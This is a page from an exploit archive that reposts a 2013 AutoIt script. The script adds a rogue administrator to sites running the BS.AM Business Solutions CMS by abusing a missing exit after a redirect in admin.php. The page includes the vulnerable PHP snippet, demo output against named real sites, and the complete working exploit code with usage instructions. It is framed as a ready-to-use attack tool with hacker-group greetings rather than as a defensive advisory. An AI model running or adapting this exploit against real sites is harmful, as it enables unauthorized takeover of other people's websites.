BS.AM Business Solutions CMS remote add admin exploit

2013.01.11
Credit: AkaStep
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#cs 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm AkaStep member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 bs_am_remote_add_admin.au3 BS.AM (BUSINESS SOLUTIONS) CMS REMOTE ADD ADMIN EXPLOIT. THIS IS A EXPLOIT WRITTEN IN AUTOIT SCRIPTING/PROGRAMMING LANGUAGE. ON SUCCESSFULL REMOTE EXPLOITATION IT WILL NEW ADMIN TO TARGET SITE. ***** THIS IS A WHOLE EXPLOIT! ***** THANK YOU! FEW DEMOS: http://asba.am http://doors.am DEMO USAGE: >poc.exe http://asba.am bigbang bigbang ############################################################## (BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8) Usage: poc.exe http://site.tld username password [*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*] [@@@] Vuln & Exploit By AkaStep [@@@] ############################################################## [+] GETTING INFO ABOUT CMS [+] [*] GOT Response : Yes! It is exactly that we are looking for! [*] ################################################## Trying to add new admin: To Site:www.asba.am With Username: bigbang With Password: bigbang ################################################## ################################################## Exploit Try Count:1 ################################################## Error Count: 0 ################################################## ################################################## Exploit Try Count:2 ################################################## Error Count: 0 ################################################## Count of errors during exploitation : 0 ################################################## [*] Seems we are going to travel xD. [*] Try to login @ Site: asba.am/cms/index.php With Username: bigbang With Password: bigbang ################################################## [*] Exit [*] ################################################## VULNERABLE CODE: NOTICE script continues it's execution.Because missing exit; after header(); FUNNY TO SEE HOW MANY PROGRAMMERS FAILS TO UNDERSTAND THIS;) //cms/admin.php ============SNIP BEGINS============ <? session_start(); if ($_SESSION['login11_error'] != "no") header("Location: index.php"); include 'config.php';?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>cms::</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <link rel="stylesheet" type="text/css" href="css/main.css" /> <script type="text/javascript" src="javascript/jquery-1.4.2.js"></script> <script type="text/javascript" src="javascript/admin.js"></script> <script type="text/javascript" src="javascript/jquery-ui-1.8.11.custom.min.js"></script> <script type="text/javascript" src="javascript/jquery.ui.datepicker-hy.js"></script> <script type="text/javascript" src="javascript/jquery.lightbox-0.5.js"></script> <link type="text/css" href="css/jquery-ui-1.8.11.custom.css" rel="stylesheet" /> </head> <body> <div id="header"> ============SNIP ENDS HERE=========== #ce #Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_UseUpx=n #AutoIt3Wrapper_Change2CUI=y #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #NoTrayIcon #include "WinHttp.au3" #include <inet.au3> #include <String.au3> $exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _ '(BS.AM Business Solutions CMS) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _ 'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _ @CRLF & "[*] DON'T HATE FROM HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _ '[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62); ConsoleWrite(@CRLF & $exploitname & @CRLF) $method='POST'; $vulnurl='cms/admin.php?lang=en&page=security'; Global $count=0,$error=0; $cmsindent='CaptchaSecurityImages.php'; $adminpanel='/cms/index.php'; if $CmdLine[0] <> 3 Then MsgBox(64,"","Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://www.site.tld ' & ' username ' & 'password' & @CRLF); exit; EndIf if $CmdLine[0]=3 Then $targetsite=$CmdLine[1]; $username=$CmdLine[2]; $password=$CmdLine[3]; EndIf if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then ConsoleWrite('Are you kidding me?'); Exit; EndIf $doublecheck=InetGet($targetsite,'',1); if @error Then ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF) Exit; EndIf ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF); sleep(Random(1200,2500,1)); $sidentify=_INetGetSource($targetsite & $adminpanel,True); if StringInStr($sidentify,$cmsindent) Then ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF) Else ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF) $error+=1; EndIf $targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','') priv8($targetsite,$username,$password,$count,$error);#~ do magic for me plizzz));~# Func priv8($targetsite,$username,$password,$count,$error) $count+=1; Global $sAddress = $targetsite $triptrop=@CRLF & _StringRepeat('#',50) & @CRLF; $whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _ $username & @CRLF & 'With Password: ' & $password & $triptrop; if $count <=1 then ConsoleWrite($whatcurrentlywedo) $doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count: ' & $error & $triptrop; ConsoleWrite($doitnicely); Global $sPostData = "username=" & $username & "&password=" & $password & "&rewrite_password=" & $password & "&ifsubmit=yes"; if $error>=2 OR $count>=2 Then ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF) if int($error)=0 then ConsoleWrite($triptrop & '[*] Seems we are going to travel xD. [*]' & _ @CRLF & 'Try to login @ ' & @CRLF & _ 'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _ $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop); exit; Else ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _ '[*] Anyway,try to login with new credentials. [*]' & @CRLF & _ '[*] May be you are Lucky;) [*]' & _ @CRLF & 'Try to login @ ' & @CRLF & _ 'Site: ' & $targetsite & $adminpanel & @CRLF & _ 'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop); EndIf exit; EndIf Global $hOpen = _WinHttpOpen("Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4325)"); Global $hConnect = _WinHttpConnect($hOpen, $sAddress) Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,''); _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-us,en;q=0.5") _WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate") _WinHttpAddRequestHeaders($hRequest, "DNT: 1") _WinHttpAddRequestHeaders($hRequest, "Keep-Alive: 300") _WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive") _WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded") _WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData)); _WinHttpSendRequest($hRequest, -1, $sPostData) _WinHttpReceiveResponse($hRequest) Global $sHeader, $sReturned If _WinHttpQueryDataAvailable($hRequest) Then $sHeader = _WinHttpQueryHeaders($hRequest) Do $sReturned &= _WinHttpReadData($hRequest) Until @error _WinHttpCloseHandle($hRequest) _WinHttpCloseHandle($hConnect) _WinHttpCloseHandle($hOpen) $targetsite=StringMid($targetsite,5,StringLen($targetsite)) Sleep(1500); priv8($targetsite,$username,$password,$count,$error); Else $error+=1 _WinHttpCloseHandle($hRequest) _WinHttpCloseHandle($hConnect) _WinHttpCloseHandle($hOpen) $targetsite=StringMid($targetsite,5,StringLen($targetsite)) Sleep(1500); priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~# EndIf EndFunc;=> priv8(); #cs ================================================ KUDOSSSSSSS ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers Also special thanks to: ottoman38 & HERO_AZE ================================================ /AkaStep #ce


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top